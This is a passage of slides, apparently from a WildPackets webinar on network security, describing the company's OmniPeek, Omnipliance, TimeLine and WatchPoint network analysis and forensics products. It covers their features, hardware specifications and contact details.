  • 45. OmniPeek Network Analyzer • OmniEngine Manager – Connect and configure distributed OmniEngines/Omnipliances • Comprehensive dashboards present network traffic in real-time – Vital statistics and graphs display trends on network and application performance – Visual peer-map shows conversations and protocols – Intuitive drill-down for root-cause analysis of performance bottlenecks • Visual Expert diagnosis speeds problem resolution – Packet and Payload visualizers provide business-centric views • Automated analytics and problem detection 24/7 – Easily create filters, triggers, scripting, advanced alarms and alerts Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 46
  • 46. Omnipliance Network Recorders • Captures and analyzes all network traffic 24x7 – Runs our OmniEngine software probe – Generates vital statistics on network and application performance – Intuitive root-cause analysis of performance bottlenecks • Expert analysis speeds problem resolution – Fault analysis, statistical analysis, and independent notification • Multiple Issue Digital Forensics – Real-time and post capture data mining for compliance and troubleshooting • Intelligent data transport – Network data analyzed locally – Detailed analysis passed to OmniPeek on demand – Summary statistics sent to WatchPoint for long term trending and reporting – Efficient use of network bandwidth • User-Extensible Platform – Plug-in architecture and SDK Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 47
  • 47. Omnipliance Network Recorders Price/performance solutions for every application Portable Edge Core Ruggedized Small Networks Datacenter Workhorse Troubleshooting Remote Offices Easily Expandable Aluminum chassis / 17” LCD 1U rack mountable chassis 3U rack mountable chassis Quad-Core Xeon 2.5GHz Quad-Core Intel Xeon Two Quad-Core Intel Xeon X3460 2.80Ghz E5530 2.4Ghz 4GB RAM 4GB RAM 6GB RAM 2 PCI-E Slots 2 PCI-E Slots 4 PCI-E Slots 2 Built-in Ethernet Ports 2 Built-in Ethernet Ports 2 Built-in Ethernet Ports 500GB and 2.5TB SATA 1TB SATA storage capacity 2TB SATA storage capacity storage capacity Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 48
  • 48. TimeLine • Fastest network recording and real-time statistical display — simultaneously ‒ 11.7Gbps sustained capture with zero packet loss ‒ Network statistics display in TimeLine visualization format • Rapid, intuitive forensics search and retrieval ‒ Historical network traffic analysis and quick data rewinding ‒ Several pre-defined forensics search templates making searches easy and fast • A natural extension to the WildPackets product line • Turnkey bundled solution ‒ Appliance + OmniEngine, OmniAdapter, OmniPeek Connect Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 49
  • 49. TimeLine For the most demanding network analysis tasks TimeLine 10g Network Forensics 3U rack mountable chassis Two Quad-Core Intel Xeon 5560 2.8Ghz 18GB RAM 4 PCI-E Slots 2 Built-in Ethernet Ports 8/16/32TB SATA storage capacity Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 50
  • 50. WatchPoint Centralized Monitoring for Distributed Enterprise Networks • High-level, aggregated view of all network segments – Monitor per campus, per region, per country • Wide range of network data – NetFlow, sFlow, OmniFlow • Web-based, customizable network dashboards • Flexible detailed reports • Omnipliances must be configured for continuous capture Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 51
  • 51. WildPackets Key Differentiators • Visual Expert Intelligence with Intuitive Drill-down – Let computer do the hard work, and return results, real-time – Packet / Payload Visualizers are faster than packet-per-packet diagnostics – Experts and analytics can be memorized and automated • Automated Capture Analytics – Filters, triggers, scripting and advanced alarming system combine to provide automated network problem detection 24x7 • Multiple Issue Network Forensics – Can be tracked by one or more people simultaneously – Real-time or post capture • User-Extensible Platform – Plug-in architecture and SDK • Aggregated Network Views and Reporting – NetFlow, sFlow, and OmniFlow Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 52
  • 52. Q&A Show us your tweets! Use today’s webinar hashtag: Follow us on SlideShare! Check out today’s slides on SlideShare #wp_cybersecurity www.slideshare.net/wildpackets with any questions, comments, or feedback. Follow us @wildpackets © WildPackets, Inc. www.wildpackets.com
  • 53. Thank You! WildPackets, Inc. 1340 Treat Boulevard, Suite 500 Walnut Creek, CA 94597 (925) 937-3200 © WildPackets, Inc. www.wildpackets.com